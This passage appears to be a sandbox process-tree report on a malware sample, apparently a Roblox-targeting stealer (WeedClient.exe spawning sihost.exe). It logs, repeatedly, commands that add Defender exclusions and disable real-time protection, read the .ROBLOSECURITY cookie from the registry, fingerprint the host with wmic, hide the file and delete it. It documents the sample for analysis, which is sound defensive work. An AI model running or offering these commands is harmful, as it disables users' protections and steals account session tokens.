        
        PID:3712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:6028
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        45⤵
        
        PID:2692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        45⤵
        
        PID:5864
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:3316
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:3468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7072
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        45⤵
        Detects videocard installed
        
        PID:5200
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5968
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        43⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        43⤵
        
        PID:5684
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        44⤵
        
        PID:6012
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        42⤵
        
        PID:6432
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        42⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        41⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        41⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        40⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        40⤵
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        39⤵
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        39⤵
        
        PID:392
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        38⤵
        
        PID:5392
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        38⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        37⤵
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        36⤵
        
        PID:5300
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        36⤵
        
        PID:5312
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        37⤵
        
        PID:1180
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        37⤵
        Views/modifies file attributes
        
        PID:3520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:1196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1524
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:7052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5908
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1888
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:6132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        37⤵
        
        PID:6776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        37⤵
        
        PID:5568
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5568 -s 412
        38⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        35⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        35⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        34⤵
        
        PID:1832
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        34⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        33⤵
        
        PID:6944
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        
        PID:5612
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5612 -s 212
        34⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        32⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        32⤵
        Drops file in Drivers directory
        
        PID:3012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:7020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:5576
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        33⤵
        Views/modifies file attributes
        
        PID:2696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2092
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:5512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6284
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:6928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        33⤵
        
        PID:6360
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        33⤵
        
        PID:5444
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        33⤵
        
        PID:5844
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        33⤵
        
        PID:5848
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:5084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5744
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:5952
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        33⤵
        Detects videocard installed
        
        PID:948
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:5688
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        34⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        31⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        31⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        30⤵
        
        PID:2416
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        Drops file in Drivers directory
        
        PID:6272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:5348
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:6692
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        30⤵
        Views/modifies file attributes
        
        PID:6968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6720
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:6736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:6784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        30⤵
        
        PID:5188
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:4888
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        30⤵
        
        PID:5340
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:3328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        30⤵
        
        PID:5868
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:3728
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        30⤵
        
        PID:3580
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:6924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4164
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        30⤵
        Detects videocard installed
        
        PID:5736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:6048
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:6584
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        31⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        System Location Discovery: System Language Discovery
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:660
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        Drops file in Drivers directory
        
        PID:6912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:4892
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        Views/modifies file attributes
        
        PID:6692
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6860
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:4324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5280
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:5936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:5168
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:5824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:5828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:2896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:1212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:6000
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:6180
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 6912 -s 2344
        28⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        System Location Discovery: System Language Discovery
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        Drops file in Drivers directory
        
        PID:5656
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:5412
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5876
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        Views/modifies file attributes
        
        PID:5244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2936
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:6200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6204
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:6412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:5252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:5512
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:5488
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:5692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:3728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:6644
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:3544
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        System Location Discovery: System Language Discovery
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:3404
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        Drops file in Drivers directory
        
        PID:3168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:6968
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        Views/modifies file attributes
        
        PID:540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6916
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4348
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:6640
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4348 -s 392
        25⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5152
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5152 -s 388
        25⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:7060
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:6352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:5172
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:6948
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        System Location Discovery: System Language Discovery
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
